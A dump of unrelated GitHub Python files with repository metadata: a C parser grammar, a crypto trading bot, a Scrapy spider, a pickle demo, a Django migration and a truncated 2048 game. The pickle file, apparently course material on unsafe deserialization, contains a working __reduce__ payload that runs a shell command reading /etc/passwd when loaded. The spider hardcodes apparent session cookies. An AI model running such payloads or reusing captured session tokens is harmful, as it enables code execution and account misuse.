p[0] = self._build_declarations(
spec=spec,
decls=[dict(decl=p[2])])[0]
def p_parameter_declaration_2(self, p):
""" parameter_declaration : declaration_specifiers abstract_declarator_opt
"""
spec = p[1]
if not spec['type']:
spec['type'] = [c_ast.IdentifierType(['int'],
coord=self._coord(p.lineno(1)))]
# Parameters can have the same names as typedefs. The trouble is that
# the parameter's name gets grouped into declaration_specifiers, making
# it look like an old-style declaration; compensate.
#
if len(spec['type']) > 1 and len(spec['type'][-1].names) == 1 and \
self._is_type_in_scope(spec['type'][-1].names[0]):
decl = self._build_declarations(
spec=spec,
decls=[dict(decl=p[2], init=None)])[0]
# This truly is an old-style parameter declaration
#
else:
decl = c_ast.Typename(
name='',
quals=spec['qual'],
type=p[2] or c_ast.TypeDecl(None, None, None),
coord=self._coord(p.lineno(2)))
typename = spec['type']
decl = self._fix_decl_name_type(decl, typename)
p[0] = decl
def p_identifier_list(self, p):
""" identifier_list : identifier
| identifier_list COMMA identifier
"""
if len(p) == 2: # single parameter
p[0] = c_ast.ParamList([p[1]], p[1].coord)
else:
p[1].params.append(p[3])
p[0] = p[1]
def p_initializer_1(self, p):
""" initializer : assignment_expression
"""
p[0] = p[1]
def p_initializer_2(self, p):
""" initializer : brace_open initializer_list_opt brace_close
| brace_open initializer_list COMMA brace_close
"""
if p[2] is None:
p[0] = c_ast.InitList([], self._coord(p.lineno(1)))
else:
p[0] = p[2]
def p_initializer_list(self, p):
""" initializer_list : designation_opt initializer
| initializer_list COMMA designation_opt initializer
"""
if len(p) == 3: # single initializer
init = p[2] if p[1] is None else c_ast.NamedInitializer(p[1], p[2])
p[0] = c_ast.InitList([init], p[2].coord)
else:
init = p[4] if p[3] is None else c_ast.NamedInitializer(p[3], p[4])
p[1].exprs.append(init)
p[0] = p[1]
def p_designation(self, p):
""" designation : designator_list EQUALS
"""
p[0] = p[1]
# Designators are represented as a list of nodes, in the order in which
# they're written in the code.
#
def p_designator_list(self, p):
""" designator_list : designator
| designator_list designator
"""
p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]]
def p_designator(self, p):
""" designator : LBRACKET constant_expression RBRACKET
| PERIOD identifier
"""
p[0] = p[2]
def p_type_name(self, p):
""" type_name : specifier_qualifier_list abstract_declarator_opt
"""
#~ print '=========='
#~ print p[1]
#~ print p[2]
#~ print p[2].children()
#~ print '=========='
typename = c_ast.Typename(
name='',
quals=p[1]['qual'],
type=p[2] or c_ast.TypeDecl(None, None, None),
coord=self._coord(p.lineno(2)))
p[0] = self._fix_decl_name_type(typename, p[1]['type'])
def p_abstract_declarator_1(self, p):
""" abstract_declarator : pointer
"""
dummytype = c_ast.TypeDecl(None, None, None)
p[0] = self._type_modify_decl(
decl=dummytype,
modifier=p[1])
def p_abstract_declarator_2(self, p):
""" abstract_declarator : pointer direct_abstract_declarator
"""
p[0] = self._type_modify_decl(p[2], p[1])
def p_abstract_declarator_3(self, p):
""" abstract_declarator : direct_abstract_declarator
"""
p[0] = p[1]
# Creating and using direct_abstract_declarator_opt here
# instead of listing both direct_abstract_declarator and the
# lack of it in the beginning of _1 and _2 caused two
# shift/reduce errors.
#
def p_direct_abstract_declarator_1(self, p):
""" direct_abstract_declarator : LPAREN abstract_declarator RPAREN """
p[0] = p[2]
def p_direct_abstract_declarator_2(self, p):
""" direct_abstract_declarator : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=p[3],
dim_quals=[],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_abstract_declarator_3(self, p):
""" direct_abstract_declarator : LBRACKET assignment_expression_opt RBRACKET
"""
p[0] = c_ast.ArrayDecl(
type=c_ast.TypeDecl(None, None, None),
dim=p[2],
dim_quals=[],
coord=self._coord(p.lineno(1)))
def p_direct_abstract_declarator_4(self, p):
""" direct_abstract_declarator : direct_abstract_declarator LBRACKET TIMES RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=c_ast.ID(p[3], self._coord(p.lineno(3))),
dim_quals=[],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_abstract_declarator_5(self, p):
""" direct_abstract_declarator : LBRACKET TIMES RBRACKET
"""
p[0] = c_ast.ArrayDecl(
type=c_ast.TypeDecl(None, None, None),
dim=c_ast.ID(p[3], self._coord(p.lineno(3))),
dim_quals=[],
coord=self._coord(p.lineno(1)))
def p_direct_abstract_declarator_6(self, p):
""" direct_abstract_declarator : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN
"""
func = c_ast.FuncDecl(
args=p[3],
type=None,
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=func)
def p_direct_abstract_declarator_7(self, p):
""" direct_abstract_declarator : LPAREN parameter_type_list_opt RPAREN
"""
p[0] = c_ast.FuncDecl(
args=p[2],
type=c_ast.TypeDecl(None, None, None),
coord=self._coord(p.lineno(1)))
# declaration is a list, statement isn't. To make it consistent, block_item
# will always be a list
#
def p_block_item(self, p):
""" block_item : declaration
| statement
"""
p[0] = p[1] if isinstance(p[1], list) else [p[1]]
# Since we made block_item a list, this just combines lists
#
def p_block_item_list(self, p):
""" block_item_list : block_item
| block_item_list block_item
"""
# Empty block items (plain ';') produce [None], so ignore them
p[0] = p[1] if (len(p) == 2 or p[2] == [None]) else p[1] + p[2]
def p_compound_statement_1(self, p):
""" compound_statement : brace_open block_item_list_opt brace_close """
p[0] = c_ast.Compound(
block_items=p[2],
coord=self._coord(p.lineno(1)))
def p_labeled_statement_1(self, p):
""" labeled_statement : ID COLON statement """
p[0] = c_ast.Label(p[1], p[3], self._coord(p.lineno(1)))
def p_labeled_statement_2(self, p):
""" labeled_statement : CASE constant_expression COLON statement """
p[0] = c_ast.Case(p[2], [p[4]], self._coord(p.lineno(1)))
def p_labeled_statement_3(self, p):
""" labeled_statement : DEFAULT COLON statement """
p[0] = c_ast.Default([p[3]], self._coord(p.lineno(1)))
def p_selection_statement_1(self, p):
""" selection_statement : IF LPAREN expression RPAREN statement """
p[0] = c_ast.If(p[3], p[5], None, self._coord(p.lineno(1)))
def p_selection_statement_2(self, p):
""" selection_statement : IF LPAREN expression RPAREN statement ELSE statement """
p[0] = c_ast.If(p[3], p[5], p[7], self._coord(p.lineno(1)))
def p_selection_statement_3(self, p):
""" selection_statement : SWITCH LPAREN expression RPAREN statement """
p[0] = fix_switch_cases(
c_ast.Switch(p[3], p[5], self._coord(p.lineno(1))))
def p_iteration_statement_1(self, p):
""" iteration_statement : WHILE LPAREN expression RPAREN statement """
p[0] = c_ast.While(p[3], p[5], self._coord(p.lineno(1)))
def p_iteration_statement_2(self, p):
""" iteration_statement : DO statement WHILE LPAREN expression RPAREN SEMI """
p[0] = c_ast.DoWhile(p[5], p[2], self._coord(p.lineno(1)))
def p_iteration_statement_3(self, p):
""" iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN statement """
p[0] = c_ast.For(p[3], p[5], p[7], p[9], self._coord(p.lineno(1)))
def p_iteration_statement_4(self, p):
""" iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN statement """
p[0] = c_ast.For(c_ast.DeclList(p[3], self._coord(p.lineno(1))),
p[4], p[6], p[8], self._coord(p.lineno(1)))
def p_jump_statement_1(self, p):
""" jump_statement : GOTO ID SEMI """
p[0] = c_ast.Goto(p[2], self._coord(p.lineno(1)))
def p_jump_statement_2(self, p):
""" jump_statement : BREAK SEMI """
p[0] = c_ast.Break(self._coord(p.lineno(1)))
def p_jump_statement_3(self, p):
""" jump_statement : CONTINUE SEMI """
p[0] = c_ast.Continue(self._coord(p.lineno(1)))
def p_jump_statement_4(self, p):
""" jump_statement : RETURN expression SEMI
| RETURN SEMI
"""
p[0] = c_ast.Return(p[2] if len(p) == 4 else None, self._coord(p.lineno(1)))
def p_expression_statement(self, p):
""" expression_statement : expression_opt SEMI """
if p[1] is None:
p[0] = c_ast.EmptyStatement(self._coord(p.lineno(1)))
else:
p[0] = p[1]
def p_expression(self, p):
""" expression : assignment_expression
| expression COMMA assignment_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
if not isinstance(p[1], c_ast.ExprList):
p[1] = c_ast.ExprList([p[1]], p[1].coord)
p[1].exprs.append(p[3])
p[0] = p[1]
def p_typedef_name(self, p):
""" typedef_name : TYPEID """
p[0] = c_ast.IdentifierType([p[1]], coord=self._coord(p.lineno(1)))
def p_assignment_expression(self, p):
""" assignment_expression : conditional_expression
| unary_expression assignment_operator assignment_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.Assignment(p[2], p[1], p[3], p[1].coord)
# K&R2 defines these as many separate rules, to encode
# precedence and associativity. Why work hard ? I'll just use
# the built in precedence/associativity specification feature
# of PLY. (see precedence declaration above)
#
def p_assignment_operator(self, p):
""" assignment_operator : EQUALS
| XOREQUAL
| TIMESEQUAL
| DIVEQUAL
| MODEQUAL
| PLUSEQUAL
| MINUSEQUAL
| LSHIFTEQUAL
| RSHIFTEQUAL
| ANDEQUAL
| OREQUAL
"""
p[0] = p[1]
def p_constant_expression(self, p):
""" constant_expression : conditional_expression """
p[0] = p[1]
def p_conditional_expression(self, p):
""" conditional_expression : binary_expression
| binary_expression CONDOP expression COLON conditional_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.TernaryOp(p[1], p[3], p[5], p[1].coord)
def p_binary_expression(self, p):
""" binary_expression : cast_expression
| binary_expression TIMES binary_expression
| binary_expression DIVIDE binary_expression
| binary_expression MOD binary_expression
| binary_expression PLUS binary_expression
| binary_expression MINUS binary_expression
| binary_expression RSHIFT binary_expression
| binary_expression LSHIFT binary_expression
| binary_expression LT binary_expression
| binary_expression LE binary_expression
| binary_expression GE binary_expression
| binary_expression GT binary_expression
| binary_expression EQ binary_expression
| binary_expression NE binary_expression
| binary_expression AND binary_expression
| binary_expression OR binary_expression
| binary_expression XOR binary_expression
| binary_expression LAND binary_expression
| binary_expression LOR binary_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.BinaryOp(p[2], p[1], p[3], p[1].coord)
def p_cast_expression_1(self, p):
""" cast_expression : unary_expression """
p[0] = p[1]
def p_cast_expression_2(self, p):
""" cast_expression : LPAREN type_name RPAREN cast_expression """
p[0] = c_ast.Cast(p[2], p[4], self._coord(p.lineno(1)))
def p_unary_expression_1(self, p):
""" unary_expression : postfix_expression """
p[0] = p[1]
def p_unary_expression_2(self, p):
""" unary_expression : PLUSPLUS unary_expression
| MINUSMINUS unary_expression
| unary_operator cast_expression
"""
p[0] = c_ast.UnaryOp(p[1], p[2], p[2].coord)
def p_unary_expression_3(self, p):
""" unary_expression : SIZEOF unary_expression
| SIZEOF LPAREN type_name RPAREN
"""
p[0] = c_ast.UnaryOp(
p[1],
p[2] if len(p) == 3 else p[3],
self._coord(p.lineno(1)))
def p_unary_operator(self, p):
""" unary_operator : AND
| TIMES
| PLUS
| MINUS
| NOT
| LNOT
"""
p[0] = p[1]
def p_postfix_expression_1(self, p):
""" postfix_expression : primary_expression """
p[0] = p[1]
def p_postfix_expression_2(self, p):
""" postfix_expression : postfix_expression LBRACKET expression RBRACKET """
p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord)
def p_postfix_expression_3(self, p):
""" postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN
| postfix_expression LPAREN RPAREN
"""
p[0] = c_ast.FuncCall(p[1], p[3] if len(p) == 5 else None, p[1].coord)
def p_postfix_expression_4(self, p):
""" postfix_expression : postfix_expression PERIOD ID
| postfix_expression PERIOD TYPEID
| postfix_expression ARROW ID
| postfix_expression ARROW TYPEID
"""
field = c_ast.ID(p[3], self._coord(p.lineno(3)))
p[0] = c_ast.StructRef(p[1], p[2], field, p[1].coord)
def p_postfix_expression_5(self, p):
""" postfix_expression : postfix_expression PLUSPLUS
| postfix_expression MINUSMINUS
"""
p[0] = c_ast.UnaryOp('p' + p[2], p[1], p[1].coord)
def p_postfix_expression_6(self, p):
""" postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close
| LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close
"""
p[0] = c_ast.CompoundLiteral(p[2], p[5])
def p_primary_expression_1(self, p):
""" primary_expression : identifier """
p[0] = p[1]
def p_primary_expression_2(self, p):
""" primary_expression : constant """
p[0] = p[1]
def p_primary_expression_3(self, p):
""" primary_expression : unified_string_literal
| unified_wstring_literal
"""
p[0] = p[1]
def p_primary_expression_4(self, p):
""" primary_expression : LPAREN expression RPAREN """
p[0] = p[2]
def p_primary_expression_5(self, p):
""" primary_expression : OFFSETOF LPAREN type_name COMMA identifier RPAREN
"""
coord = self._coord(p.lineno(1))
p[0] = c_ast.FuncCall(c_ast.ID(p[1], coord),
c_ast.ExprList([p[3], p[5]], coord),
coord)
def p_argument_expression_list(self, p):
""" argument_expression_list : assignment_expression
| argument_expression_list COMMA assignment_expression
"""
if len(p) == 2: # single expr
p[0] = c_ast.ExprList([p[1]], p[1].coord)
else:
p[1].exprs.append(p[3])
p[0] = p[1]
def p_identifier(self, p):
""" identifier : ID """
p[0] = c_ast.ID(p[1], self._coord(p.lineno(1)))
def p_constant_1(self, p):
""" constant : INT_CONST_DEC
| INT_CONST_OCT
| INT_CONST_HEX
| INT_CONST_BIN
"""
p[0] = c_ast.Constant(
'int', p[1], self._coord(p.lineno(1)))
def p_constant_2(self, p):
""" constant : FLOAT_CONST
| HEX_FLOAT_CONST
"""
p[0] = c_ast.Constant(
'float', p[1], self._coord(p.lineno(1)))
def p_constant_3(self, p):
""" constant : CHAR_CONST
| WCHAR_CONST
"""
p[0] = c_ast.Constant(
'char', p[1], self._coord(p.lineno(1)))
# The "unified" string and wstring literal rules are for supporting
# concatenation of adjacent string literals.
# I.e. "hello " "world" is seen by the C compiler as a single string literal
# with the value "hello world"
#
def p_unified_string_literal(self, p):
""" unified_string_literal : STRING_LITERAL
| unified_string_literal STRING_LITERAL
"""
if len(p) == 2: # single literal
p[0] = c_ast.Constant(
'string', p[1], self._coord(p.lineno(1)))
else:
p[1].value = p[1].value[:-1] + p[2][1:]
p[0] = p[1]
def p_unified_wstring_literal(self, p):
""" unified_wstring_literal : WSTRING_LITERAL
| unified_wstring_literal WSTRING_LITERAL
"""
if len(p) == 2: # single literal
p[0] = c_ast.Constant(
'string', p[1], self._coord(p.lineno(1)))
else:
p[1].value = p[1].value.rstrip()[:-1] + p[2][2:]
p[0] = p[1]
def p_brace_open(self, p):
""" brace_open : LBRACE
"""
p[0] = p[1]
def p_brace_close(self, p):
""" brace_close : RBRACE
"""
p[0] = p[1]
def p_empty(self, p):
'empty : '
p[0] = None
def p_error(self, p):
# If error recovery is added here in the future, make sure
# _get_yacc_lookahead_token still works!
#
if p:
self._parse_error(
'before: %s' % p.value,
self._coord(lineno=p.lineno,
column=self.clex.find_tok_column(p)))
else:
self._parse_error('At end of input', '')
#------------------------------------------------------------------------------
if __name__ == "__main__":
import pprint
import time, sys
#t1 = time.time()
#parser = CParser(lex_optimize=True, yacc_debug=True, yacc_optimize=False)
#sys.write(time.time() - t1)
#buf = '''
#int (*k)(int);
#'''
## set debuglevel to 2 for debugging
#t = parser.parse(buf, 'x.c', debuglevel=0)
#t.show(showcoord=True)
| [
"[email protected]"
]
| |
15d401d6d7e7ae93bfe617029b03a032d777b847 | 50f747ae46f0c1c7aedbd701ec191f332779d103 | /Main/test_algo_bot.py | 6e49f7050bfa79fbf324a3383aa34d2cd02f718f | []
| no_license | marcellinamichie291/Machine_Teachers | 03c842187cd4352f01b98c20c17c60eedb08bf2d | 417e41428a65f88a7612874edaa60d7018ff9b0f | refs/heads/main | 2023-03-23T02:47:41.572264 | 2021-01-16T15:51:46 | 2021-01-16T15:51:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,269 | py | import os
import numpy as np
import pandas as pd
import ccxt
import time
from dotenv import load_dotenv
from numpy.random import seed
seed(1)
from tensorflow import random
random.set_seed(2)
from sklearn.preprocessing import MinMaxScaler
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from stock_predictor import Stock_predictor
def initialize(cash=None):
"""Initialize the dashboard, data storage, and account balances."""
print("Intializing Account and DataFrame")
# Initialize Account
account = {"balance": cash, "shares": 0}
# Initialize dataframe
df = fetch_data()
# @TODO: We will complete the rest of this later!
return account, df
def build_dashboard(data, signals):
"""Build the dashboard."""
# @TODO: We will complete this later!
def fetch_data():
"""Fetches the latest prices."""
print("Fetching data...")
load_dotenv()
kraken_public_key = os.getenv("KRAKEN_PUBLIC_KEY")
kraken_secret_key = os.getenv("KRAKEN_SECRET_KEY")
kraken = ccxt.kraken({"apiKey": kraken_public_key, "secret": kraken_secret_key})
close = kraken.fetch_ticker("NFLX")["close"]
volume = kraken.fetch_ticker("NFLX")["volume"]
datetime = kraken.fetch_ticker("NFLX")["datetime"]
df = pd.DataFrame({"close": [close]})
df.index = pd.to_datetime([datetime])
return df
def generate_signals(df):
"""Generates trading signals for a given dataset."""
print("Generating Signals")
# Set window
short_window = 10
signals = df.copy()
signals["signal"] = 0.0
# Generate the short and long moving averages
signals["sma10"] = signals["close"].rolling(window=10).mean()
signals["sma20"] = signals["close"].rolling(window=20).mean()
# Generate the trading signal 0 or 1,
signals["signal"][short_window:] = np.where(
signals["sma10"][short_window:] > signals["sma20"][short_window:], 1.0, 0.0
)
# Calculate the points in time at which a position should be taken, 1 or -1
signals["entry/exit"] = signals["signal"].diff()
return signals
def execute_trade_strategy(signals, account):
"""Makes a buy/sell/hold decision."""
print("Executing Trading Strategy!")
if signals["entry/exit"].iloc[-1] == 1.0:
print("buy")
number_to_buy = round(account["balance"] / signals["close"].iloc[-1], 0) * 0.001
account["balance"] -= number_to_buy * signals["close"].iloc[-1]
account["shares"] += number_to_buy
elif signals["entry/exit"].iloc[-1] == -1.0:
print("sell")
account["balance"] += signals["close"].iloc[-1] * account["shares"]
account["shares"] = 0
else:
print("hold")
return account
print("Initializing account and DataFrame")
account, df = initialize(10000)
print(df)
def main():
while True:
global account
global df
# Fetch and save new data
new_df = fetch_data()
df = df.append(new_df, ignore_index=True)
min_window = 22
if df.shape[0] >= min_window:
signals = generate_signals(df)
print(signals)
account = execute_trade_strategy(signals, account)
time.sleep(.3)
main()
| [
"[email protected]"
]
| |
8a7ff0ad022e61991efae1db238130da5169b004 | 7259dbcc9e32502945d362caa43d4ad380cd04ea | /OIT_SpiderCode/OYT_zujuan_Param/OYT_Scrapy_Param/spiders/new_zujuan_English_middle_spiderparam.py | 27bc29f69ebc3bbe7b018e3cdfcf6fd90583eb7c | [
"MIT"
]
| permissive | Doraying1230/Python-Study | daa143c133262f4305624d180b38205afe241163 | 8dccfa2108002d18251053147ccf36551d90c22b | refs/heads/master | 2020-03-29T13:46:13.061373 | 2018-07-26T15:19:32 | 2018-07-26T15:19:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,915 | py | #coding:utf-8
import scrapy
from ..common.BaseObject import BaseObject
from scrapy.spider import CrawlSpider
from scrapy.selector import Selector
from scrapy.http import Request,FormRequest
from scrapy.selector import Selector
from scrapy.http.cookies import CookieJar
from fake_useragent import UserAgent
import time
import re
import os
class ZuQuanLoadData(BaseObject,CrawlSpider):
name = 'zujuan_english_middle_param'
custom_settings = {
'DOWNLOAD_DELAY': 3, 'CONCURRENT_REQUESTS_PER_IP': 5,
'ITEM_PIPELINES': {'OIT_ScrapyData.pipelines.OitScrapydataPipeline': None, }
}
def __init__(self):
ua = UserAgent()
user_agent = ua.random
self.file_name='zujuan_english_middle_param'
self.cookieValue = {'xd': '75519cb9f2bf90d001c0560f5c40520062a60ada9cb38350078f83e04ee38a31a%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22xd%22%3Bi%3A1%3Bi%3A2%3B%7D',
'isdialog': 'bad3c21672f08107d1d921526d191f58bd47d79e7dbb432bd32624a836b42e85a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22isdialog%22%3Bi%3A1%3Bs%3A4%3A%22show%22%3B%7D',
'_csrf': '34c90a094ad3b3ab53cb75751fcab02bf693c164a6f5dfa244a6aec61e2f187ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22YlTOGIyOfskw0gy-voJy0vbGw4VVswCs%22%3B%7D',
'device': '310bdaba05b30bb632f66fde9bf3e2b91ebc4d607c250c2e1a1d9e0dfb900f01a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22device%22%3Bi%3A1%3BN%3B%7D',
'PHPSESSID': 'utuj4csehjg3q9inhnuhptugk6',
'_sync_login_identity': '771bfb9f524cb8005c68374bdf39c9f22c36d71cf21d91082b96e7bd7a21e9eea%3A2%3A%7Bi%3A0%3Bs%3A20%3A%22_sync_login_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B1285801%2C%22YwmDuM6ftsN7jeMH7VDdT4OI-SvOisii%22%2C86400%5D%22%3B%7D',
'chid': '14e5d5f939c71d411898b3ee4671b5e06472c56cd9cffb59cc071e18732212f1a%3A2%3A%7Bi%3A0%3Bs%3A4%3A%22chid%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D',
'_identity': '95b973f53ecb67fdb27fe40c5660df1bbdb9c168cac8d1999dc6d0772a9ea122a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B1285801%2C%22fa26ed63eeec36f3e1682f05b68cd887%22%2C86400%5D%22%3B%7D',
'Hm_lvt_6de0a5b2c05e49d1c850edca0c13051f': '1515666025',
'Hm_lpvt_6de0a5b2c05e49d1c850edca0c13051f': '1515666640'}
self.hearders = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Connection': 'keep - alive',
# 'Referer': 'http://www.zujuan.com/question /index?chid = 3 & xd = 1',
'User-Agent': user_agent#'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36'
}
print(self.hearders)
self.domain = 'http://www.zujuan.com'
def start_requests(self):
start_url = 'http://www.zujuan.com/question/index?chid=4&xd=2'
return [Request(url=start_url,cookies=self.cookieValue,headers=self.hearders,callback=self.parse_version)]
def parse_version(self,response):
result = response.body.decode()
resu = Selector(text=result)
versionTexts = resu.xpath('//div[@class="type-items"][1]/div/div/div/a/text()').extract()
versionUrls = resu.xpath('//div[@class="type-items"][1]/div/div/div/a/@href').extract()
version = dict(zip(versionTexts, versionUrls))
print(version)#{'人教版': '/question?bookversion=11740&chid=3&xd=1', '青岛版六三制': '/question?bookversion=23087&chid=3&xd=1', '北师大版': '/question?bookversion=23313&chid=3&xd=1', '苏教版': '/question?bookversion=25571&chid=3&xd=1', '西师大版': '/question?bookversion=47500&chid=3&xd=1', '青岛版五四制': '/question?bookversion=70885&chid=3&xd=1', '浙教版': '/question?bookversion=106060&chid=3&xd=1'}
for text in version :
if ('牛津' in text):
manURL =self.domain+version[text]#http://www.zujuan.com/question?bookversion=25571&chid=3&xd=1
deliver_param = {'version':'牛津译林版'}
deliver_param['course'] = '英语'
return [Request(url=manURL, meta=deliver_param,cookies=self.cookieValue, headers=self.hearders,callback=self.parse_categories)]
elif('沪教' in text):
manURL = self.domain + version[text] # http://www.zujuan.com/question?bookversion=25571&chid=3&xd=1
deliver_param = {'version': '沪教版'}
deliver_param['course'] = '英语'
return [Request(url=manURL,meta=deliver_param, cookies=self.cookieValue, headers=self.hearders,
callback=self.parse_categories)]
else:
pass
def parse_categories(self,response):
print(123,response.meta)
result = response.body.decode()
resu = Selector(text=result)
categoriesTexts = resu.xpath('//div[@class="type-items"][2]/div/div/div/a/text()').extract()
categoriesUrls = resu.xpath('//div[@class="type-items"][2]/div/div/div/a/@href').extract()
#http://www.zujuan.com/question?categories=25576&bookversion=25571&nianji=25576&chid=3&xd=1
categories = dict(zip(categoriesTexts, categoriesUrls))
print(123,categories)
categories_list = []
# print(categories)# {'一年级上册': '/question?categories=25572&bookversion=25571&nianji=25572&chid=3&xd=1', '一年级下册': '/question?categories=25573&bookversion=25571&nianji=25573&chid=3&xd=1', '二年级上册': '/question?categories=25574&bookversion=25571&nianji=25574&chid=3&xd=1', '二年级下册': '/question?categories=25575&bookversion=25571&nianji=25575&chid=3&xd=1', '三年级上册': '/question?categories=25576&bookversion=25571&nianji=25576&chid=3&xd=1', '三年级下册': '/question?categories=25577&bookversion=25571&nianji=25577&chid=3&xd=1', '四年级上册': '/question?categories=25578&bookversion=25571&nianji=25578&chid=3&xd=1', '四年级下册': '/question?categories=25579&bookversion=25571&nianji=25579&chid=3&xd=1', '五年级上册': '/question?categories=25580&bookversion=25571&nianji=25580&chid=3&xd=1', '五年级下册': '/question?categories=25581&bookversion=25571&nianji=25581&chid=3&xd=1', '六年级上册': '/question?categories=25582&bookversion=25571&nianji=25582&chid=3&xd=1', '六年级下册': '/question?categories=25592&bookversion=25571&nianji=25592&chid=3&xd=1'}
for text in categories:
categories_list.append(text)
comment = 0
while comment < len(categories_list):
text = categories_list[comment]
nianjiContentUrl = self.domain + categories[text]
print(12,nianjiContentUrl)
nianjiContentUrl =self.domain+categories[text]
comment += 1
response.meta['nianji'] = text
yield Request(url=nianjiContentUrl,meta=response.meta,cookies=self.cookieValue, headers=self.hearders,callback=self.parse_categories_content)
def parse_categories_content(self,response):
print(123,response.meta)
result = response.body.decode()
resu = Selector(text=result)
sectionsText = resu.xpath('//div[@id="J_Tree"]/div/a/text()').extract()
sectionsUrl = resu.xpath('//div[@id="J_Tree"]/div/a/@href').extract()
sections = dict(zip(sectionsText,sectionsUrl))
print(sections)
self.make_file()
sections_Text = []
sections_number = []
for text in sections:
sections_Text.append(text)
categoriesNumber = sections[text]
print(type(categoriesNumber),categoriesNumber)
ret = re.findall(r'categories=(\d*)&',categoriesNumber)
sections_number.append(ret[0])
print(123, ret)
need_sections_dict = dict(zip(sections_Text, sections_number))
nianji = response.meta ['nianji']
response.meta[nianji] = need_sections_dict
need_sections_str = str(response.meta)
with open('d:\\xiti10001\\zujuan\\{0}\\{1}\\categories_english_{0}.txt'.format(time.strftime('%Y%m%d',time.localtime(time.time())),self.file_name),'a') as f:
f.write(need_sections_str)
f.write('\n')
# categoriesNumber_s = categoriesNumber.find('=')
# print(categoriesNumber_s)
# categoriesNumber_e = categoriesNumber.find('&')
# print(categoriesNumber_e)
# categoriesNumbers = categoriesNumber[categoriesNumber_s,categoriesNumber_e]
def make_file(self):
path = 'd:\\xiti10001\\zujuan\\{0}\\{1}'.format(time.strftime('%Y%m%d',time.localtime(time.time())),self.file_name)
isExists = os.path.exists(path)
if (isExists):
pass;
else:
os.makedirs(path)
| [
"[email protected]"
]
| |
cb983a155f9e7664086637e86eac8576ef2b6efb | 9b991a23f3d7df0de43132233b978b0ffb415c6e | /course3/pickle/pickle_file.py | a6de8139cd7c6ff2538d84242a034c69399b0ad7 | []
| no_license | mycguo/python-deepdive | cdc0fa6cf50728c58a8a8836f2f2800e7fdd7fb7 | 37b181470e80a94fa6db5b237fb7de521130905d | refs/heads/master | 2022-12-14T15:58:00.973247 | 2020-09-12T03:38:14 | 2020-09-12T03:38:14 | 289,349,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | import os
import pickle
class Exploit():
def __reduce__(self):
return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))
def serialize_exploit(fname):
with open(fname, 'wb') as f:
pickle.dump(Exploit(), f)
serialize_exploit('loadme')
pickle.load(open('loadme', 'rb'))
| [
"[email protected]"
]
| |
e04c76ee7cd3d8b1f62e00662a715d5ab09713dc | 926a9065a4fc220d022c8d7edcc4c01d1a4587f8 | /products/migrations/0039_auto_20200613_1112.py | e831c7857073ca1067ff482093967e12c0069745 | []
| no_license | singham3/electrotrade | 6b1ac38fe68f34b1bc6bd074e10271f1a94f75d7 | 2d1c4f1d5a4672c31cca0d4478b77ae134bb43d5 | refs/heads/master | 2022-11-20T22:07:16.588433 | 2020-07-24T14:31:03 | 2020-07-24T14:31:03 | 268,452,091 | 0 | 1 | null | 2020-07-19T20:20:51 | 2020-06-01T07:19:04 | Python | UTF-8 | Python | false | false | 396 | py | # Generated by Django 3.0.3 on 2020-06-13 11:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0038_auto_20200613_1108'),
]
operations = [
migrations.AlterField(
model_name='orderid',
name='order_id',
field=models.IntegerField(default=54268140),
),
]
| [
"[email protected]"
]
| |
d425f088b08116e205b3ffe26d9c77b5c1e4e38d | e04ce35fd36785c3695f3107de262f1db13bdc00 | /2048.py | aa81421376af01b7b62722748fa542018b1195d5 | []
| no_license | Timurbl/game_2048 | edd6b6082263f7cab9c9a1ba777b3730b87b0c5b | ef5cccc75766b524eed2260111e9b092e9366538 | refs/heads/master | 2020-03-26T06:55:34.730690 | 2018-08-13T20:05:58 | 2018-08-13T20:05:58 | 144,628,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | from tkinter import *
from logic2048 import Game
N = 4
color = {'' : 'light gray',
2 : 'pink',
4 : 'red',
8 : 'orange',
16: 'yellow',
32: 'light blue',
64: 'blue',
128: 'light green',
256: 'green'}
def left(event):
game.left()
draw(game)
if game.game_over():
print('GAME OVER')
def right(event):
game.right()
draw(game)
if game.game_over():
print('GAME OVER')
def up(event):
game.up()
draw(game)
if game.game_over():
print('GAME OVER')
def down(event):
game.down()
draw(game)
if game.game_over():
print('GAME OVER')
def draw(game):
for i in range(N):
for j in range(N):
